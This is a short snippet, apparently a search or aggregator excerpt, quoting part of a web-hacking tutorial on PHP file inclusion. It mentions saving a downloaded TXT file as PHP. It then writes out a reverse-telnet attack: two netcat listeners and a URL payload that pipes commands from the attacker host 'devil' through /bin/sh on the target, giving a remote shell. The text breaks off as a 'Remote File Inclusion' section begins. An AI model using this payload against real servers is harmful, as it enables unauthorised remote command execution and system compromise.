Detected 4 occurrence(s) of ‘remote file inclusion’: can download a TXT file and save it as PHP. We also can try to do a reverse telnet: pepelux:~$ nc -vv -l -p 8888 pepelux:~$ nc -vv -l -p 8889 http://host/?file=xxxx&cmd=telnet devil 8888 | /bin/sh | telnet devil 8889 ----[ 2.4 - Remote File Inclusion If allow_url_include […]
↧